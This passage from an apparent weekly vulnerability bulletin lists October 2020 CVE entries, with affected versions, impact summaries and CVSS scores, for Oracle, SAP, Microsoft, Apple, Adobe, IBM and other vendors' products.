oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14806
MISC
oracle — peoplesoft_enterprise_peopletools Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 5.8 CVE-2020-14832
MISC
oracle — rest_data_services Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 4 CVE-2020-14744
MISC
oracle — rest_data_services Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 4 CVE-2020-14745
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4.9 CVE-2020-14754
MISC
oracle — text Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Text. Successful attacks of this vulnerability can result in takeover of Oracle Text. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 6.8 CVE-2020-14734
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14833
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14808
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14834
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 5.8 CVE-2020-14857
MISC
oracle — utilities_framework Vulnerability in the Oracle Utilities Framework product of Oracle Utilities Applications (component: System Wide). Supported versions that are affected are 2.2.0.0.0, 4.2.0.2.0, 4.2.0.3.0, 4.3.0.1.0 – 4.3.0.6.0, 4.4.0.0.0 and 4.4.0.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). 2020-10-21 5.5 CVE-2020-14895
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 4.9 CVE-2020-14889
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 4.9 CVE-2020-14886
MISC
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 4.9 CVE-2020-14892
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 5 CVE-2020-14820
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). The supported version that is affected is 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N). 2020-10-21 6.8 CVE-2020-14757
MISC
orchid — platform In platform before version 9.4.4, inline attributes are not properly escaped. If the data that came from users was not escaped, then an XSS vulnerability is possible. The issue was introduced in 9.0.0 and fixed in 9.4.4. 2020-10-19 4.3 CVE-2020-15263
MISC
CONFIRM
powerdns — recursor An issue has been found in PowerDNS Recursor before 4.1.18, 4.2.x before 4.2.5, and 4.3.x before 4.3.5. A remote attacker can cause the cached records for a given name to be updated to the Bogus DNSSEC validation state, instead of their actual DNSSEC Secure state, via a DNS ANY query. This results in a denial of service for installations that always validate (dnssec=validate), and for clients requesting validation when on-demand validation is enabled (dnssec=process). 2020-10-16 5 CVE-2020-25829
SUSE
CONFIRM
sap — 3d_visual_enterprise_viewer SAP 3D Visual Enterprise Viewer, version 9, allows an attacker to send a certain manipulated file to the victim, which can lead to leakage of sensitive information when the victim loads the malicious file into the VE viewer, leading to Information Disclosure. 2020-10-20 4.3 CVE-2020-6315
MISC
MISC
sap — banking_services SAP Banking Services version 500 uses an incorrect authorization object in some of its reports. Although the affected reports are protected with other authorization objects, exploitation of the vulnerability could lead to privilege escalation and violation in segregation of duties, which in turn could lead to service interruptions and system unavailability for the victim and users of the component. 2020-10-20 6.8 CVE-2020-6362
MISC
MISC
sap — businessobjects_business_intelligence_platform SAP BusinessObjects Business Intelligence Platform (Web Services) versions – 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability. 2020-10-20 5 CVE-2020-6308
MISC
MISC
sap — netweaver_compare_systems SAP NetWeaver (Compare Systems) versions – 7.20, 7.30, 7.40, 7.50, does not sufficiently validate uploaded XML documents. An attacker with administrative privileges can retrieve arbitrary files including files on OS level from the server and/or can execute a denial-of-service. 2020-10-20 5.5 CVE-2020-6366
MISC
MISC
sap — netweaver_composite_application_framework There is a reflected cross site scripting vulnerability in SAP NetWeaver Composite Application Framework, versions – 7.20, 7.30, 7.31, 7.40, 7.50. An unauthenticated attacker can trick an unsuspecting authenticated user to click on a malicious link. The end user's browser has no way to know that the script should not be trusted, and will execute the script, resulting in sensitive information being disclosed or modified. 2020-10-20 4.3 CVE-2020-6367
MISC
MISC
ts.ed_project — ts.ed This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. 2020-10-20 6.8 CVE-2020-7748
MISC
MISC
MISC
yandex — yandex_browser User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Yandex Browser version 20.8.3 and prior versions, and was fixed in version 20.8.4 released October 1, 2020. 2020-10-20 4.3 CVE-2020-7369
MISC
MISC

Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
apple — ipad_os An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information. 2020-10-16 2.1 CVE-2020-9934
MISC
MISC
apple — ipad_os A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen. 2020-10-16 2.1 CVE-2020-9959
MISC
apple — mac_os_x This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information. 2020-10-16 2.1 CVE-2020-9913
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode. 2020-10-16 2.1 CVE-2020-9912
MISC
cisco — firepower_threat_defense A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to access hidden commands. The vulnerability is due to the presence of undocumented configuration commands. An attacker could exploit this vulnerability by performing specific steps that make the hidden commands accessible. A successful exploit could allow the attacker to make configuration changes to various sections of an affected device that should not be exposed to CLI access. 2020-10-21 1.9 CVE-2020-3352
CISCO
halgatewood — testimonial_rotator Testimonial Rotator WordPress Plugin 3.0.2 is affected by Cross Site Scripting (XSS) in /wp-admin/post.php. If a user intercepts a request and inserts a payload in “cite” parameter, the payload will be stored in the database. 2020-10-16 3.5 CVE-2020-26672
MISC
huawei — mate_20_firmware HUAWEI Mate 20 versions earlier than 10.1.0.163(C00E160R3P8) have a JavaScript injection vulnerability. A module does not verify a specific input. This could allow attackers to bypass filter mechanism to launch JavaScript injection. This could compromise normal service of the affected module. 2020-10-19 2.1 CVE-2020-9092
MISC
ibm — spectrum_scale IBM Spectrum Scale V4.2.0.0 through V4.2.3.22 and V5.0.0.0 through V5.0.5 could allow a local attacker to cause a denial of service by sending a large number of RPC requests to the mmfsd daemon which would cause the service to crash. IBM X-Force ID: 181991. 2020-10-20 2.1 CVE-2020-4491
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188595. 2020-10-20 3.5 CVE-2020-4755
XF
CONFIRM
ibm — sterling_b2b_integrator IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 and IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183933. 2020-10-20 3.5 CVE-2020-4564
XF
CONFIRM
CONFIRM
lightning-viz — lightning This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller. 2020-10-20 3.5 CVE-2020-7747
MISC
MISC
MISC
microsoft — dynamics_365 An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka ‘Dynamics 365 Commerce Elevation of Privilege Vulnerability’. 2020-10-16 3.3 CVE-2020-16943
MISC
microsoft — dynamics_365 A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16978. 2020-10-16 3.5 CVE-2020-16956
MISC
microsoft — dynamics_365 A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16956. 2020-10-16 3.5 CVE-2020-16978
MISC
microsoft — sharepoint_designer A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16945. 2020-10-16 3.5 CVE-2020-16946
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 2.1 CVE-2020-16941
MISC
microsoft — sharepoint_enterprise_server This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka ‘Microsoft SharePoint Reflective XSS Vulnerability’. 2020-10-16 3.5 CVE-2020-16944
MISC
microsoft — sharepoint_enterprise_server A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16946. 2020-10-16 3.5 CVE-2020-16945
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 2.1 CVE-2020-16942
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16938. 2020-10-16 2.1 CVE-2020-16901
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka ‘Windows Elevation of Privilege Vulnerability’. 2020-10-16 3.6 CVE-2020-16877
MISC
microsoft — windows_10 An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka ‘NetBT Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16897
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka ‘Windows Enterprise App Management Service Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16919
MISC
microsoft — windows_10 An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka ‘Windows GDI+ Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16914
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16901. 2020-10-16 2.1 CVE-2020-16938
MISC
microsoft — windows_10 An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka ‘Windows Text Services Framework Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16921
MISC
microsoft — windows_10 A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka ‘Windows Spoofing Vulnerability’. 2020-10-16 2.1 CVE-2020-16922
MISC
oracle — hospitality_reporting_and_analytics Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Installation). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Reporting and Analytics accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). 2020-10-21 1.9 CVE-2020-14753
MISC
oracle — hyperion_bi+ Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Hyperion BI+ accessible data. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 2.1 CVE-2020-14767
MISC
oracle — hyperion_planning Vulnerability in the Hyperion Planning product of Oracle Hyperion (component: Application Development Framework). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Planning. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Planning accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 2.1 CVE-2020-14764
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 3.5 CVE-2020-14791
CONFIRM
MISC
oracle — retail_customer_management_and_segmentation_foundation Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Promotions). The supported version that is affected is 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 3.5 CVE-2020-14732
MISC
oracle — retail_customer_management_and_segmentation_foundation Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Segment). Supported versions that are affected are 18.0 and 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 3.5 CVE-2020-14731
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with network access via SSH to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 2.1 CVE-2020-14818
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 3.3 CVE-2020-14759
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:L). 2020-10-21 3.6 CVE-2020-14758
MISC
oracle — sql_developer Vulnerability in the SQL Developer Install component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows low privileged attacker having Client Computer User Account privilege with logon to the infrastructure where SQL Developer Install executes to compromise SQL Developer Install. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of SQL Developer Install accessible data. CVSS 3.1 Base Score 2.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 1.9 CVE-2020-14740
MISC
sap — netweaver_design_time_repository SAP NetWeaver Design Time Repository (DTR), versions – 7.11, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 2020-10-20 3.5 CVE-2020-6370
MISC
MISC
vmware — horizon_client VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result in a denial-of-service condition on the machine where Horizon Client for Windows is installed. 2020-10-16 3.6 CVE-2020-3991
MISC


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — after_effects
 
Adobe After Effects version 17.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .aepx file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-21 not yet calculated CVE-2020-24418
MISC
adobe — after_effects
 
Adobe After Effects version 17.1.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24419
MISC
adobe — animate
 
Adobe Animate version 20.5 (and earlier) is affected by a stack overflow vulnerability, which could lead to arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 not yet calculated CVE-2020-9748
MISC
adobe — creative_cloud_desktop_application
 
Adobe Creative Cloud Desktop Application version 5.2 (and earlier) and 2.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24422
MISC
adobe — dreamweaver
 
Dreamweaver version 20.2 (and earlier) is affected by an uncontrolled search path element vulnerability that could lead to privilege escalation. Successful exploitation could result in a local user with permissions to write to the file system running system commands with administrator privileges. 2020-10-21 not yet calculated CVE-2020-24425
MISC
adobe — indesign
 
Adobe InDesign version 15.1.2 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious .indd file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2020-10-21 not yet calculated CVE-2020-24421
MISC
adobe — magento
 
In Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. The issue is patched in versions 19.4.8 and 20.0.4. 2020-10-21 not yet calculated CVE-2020-15244
MISC
CONFIRM
adobe — media_encoder
 
